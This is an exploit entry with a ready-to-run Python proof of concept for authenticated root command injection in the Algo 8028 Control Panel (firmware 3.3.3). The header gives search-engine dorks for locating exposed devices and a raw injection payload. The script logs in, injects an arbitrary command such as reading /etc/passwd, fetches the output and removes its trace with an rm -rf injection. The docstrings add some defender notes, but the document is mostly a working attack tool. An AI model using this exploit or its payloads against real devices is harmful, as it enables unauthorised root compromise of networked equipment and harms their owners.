Algo 8028 Control Panel Exploit, Remote Code Execution (RCE) (Authenticated)

# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:

# Because http://<IP:PORT>/control/fm-data.lua does not sanitize the `source` form field, a logged-in user can inject shell commands that run as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /

#!/usr/bin/env python3
import sys
import requests

# Session cookies from a successful login(); send_command() reads this
# module-level value when it posts to the file-manager endpoint.
cookie = None

def main():
    """Command-line entry point for the proof of concept.

    Expects exactly three arguments after the script name: the device
    address, the control-panel password and the command string. With any
    other argument count it prints the usage text and returns. The command
    is only sent when login() reports success.
    """
    # argv[0] is the script name, so three user arguments give a length of 4.
    if len(sys.argv) != 4:
        print_help()
        return

    host, password, command = sys.argv[1:4]

    # The injection endpoint is used with the session cookies from login(),
    # matching the "(Authenticated)" label in the advisory header.
    if not login(host, password):
        return
    send_command(host, command)

def print_help():
    """Print the expected argument order and one sample invocation."""
    help_lines = (
        "Usage: algo.py 192.168.1.123 password command",
        'Example: algo.py 192.168.123 algo "cat /etc/passwd"',
    )
    for line in help_lines:
        print(line)

def login(host, password):
    """Log in to the control panel and keep the session cookies.

    Posts the password as the ``pwd`` form field to ``/index.lua`` on the
    device. Any response whose body lacks the text "Invalid Password" is
    treated as a successful login, and its cookies are stored in the
    module-level ``cookie`` for later requests.

    Args:
        host: Address (optionally with port) of the device web interface.
        password: Control-panel password to submit.

    Returns:
        True when the failure marker is absent from the response body,
        False when it is present.
    """
    global cookie

    # The URL is plain http://, so the password crosses the network in
    # cleartext; anyone reviewing exposure of this panel should treat the
    # management password as observable on that path.
    response = requests.post(f"http://{host}/index.lua", data={"pwd": password})

    # Success is inferred from page text alone; the HTTP status code is
    # never inspected.
    if "Invalid Password" in response.text:
        print("Invalid password")
        return False

    cookie = response.cookies
    print("Successfully logged in\n")
    return True

def send_command(host, command):
    """Demonstrate the fm-data.lua command injection and print the output.

    Three requests are made, in order:

    1. A POST to ``/control/fm-data.lua`` with ``action=rename`` whose
       ``source`` field embeds ``command`` in shell syntax and redirects
       its output to ``/opt/algo/web/root/a.txt``.
    2. A GET of ``/a.txt`` to read that output back. The body is printed
       unless it contains "404 Not Found".
    3. A second POST of the same shape that removes ``a.txt``.

    The advisory header attributes the flaw to missing sanitization in
    fm-data.lua and says the injected command runs as root. Presumably the
    handler places ``source`` into a shell command line, but the server
    code is not shown here -- confirm against the firmware.

    Defender notes, taken from what the requests look like on the wire:
    - Both POSTs go to /control/fm-data.lua with action=rename and a
      ``source`` value containing a double quote, ``;`` and ``$(``, none of
      which belong in a rename path. That is a usable log/WAF signature.
    - The output file is written under the web root and fetched without
      cookies, so it is readable by any client until the cleanup POST runs.
      Unexpected files under /opt/algo/web/root are an artefact to check
      for. The header example uses cmd.txt, this script uses a.txt.
    - The root fix belongs in the handler (validate ``source`` as a path
      and avoid passing it to a shell); until then, limiting who can reach
      the control panel reduces exposure.

    Args:
        host: Address (optionally with port) of the device web interface.
        command: Command string substituted into the ``source`` field.
    """
    endpoint = f"http://{host}/control/fm-data.lua"
    output_url = f"http://{host}/a.txt"

    # Request 1: rename action carrying the injected shell fragment. The
    # response is not examined; success is judged from the fetch below.
    inject_form = {
        "action": "rename",
        "source": f'/a";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;"',
        "target": "/",
    }
    requests.post(endpoint, data=inject_form, cookies=cookie)

    # Request 2: read the output file back. No session cookies are sent.
    fetched = requests.get(output_url)

    # A body containing the 404 marker is taken to mean the file was never
    # created, i.e. the injected command did not run.
    if "404 Not Found" not in fetched.text:
        print(fetched.text)
    else:
        print("Command was not executed (404)")

    # Request 3: remove a.txt from the web root through the same field.
    cleanup_form = {
        "action": "rename",
        "source": '/a";$(rm -rf /opt/algo/web/root/a.txt);"',
        "target": "/",
    }
    requests.post(endpoint, data=cleanup_form, cookies=cookie)

# Run the proof of concept only when this file is executed as a script;
# importing it defines the functions without sending any request.
if __name__ == "__main__":
    main()
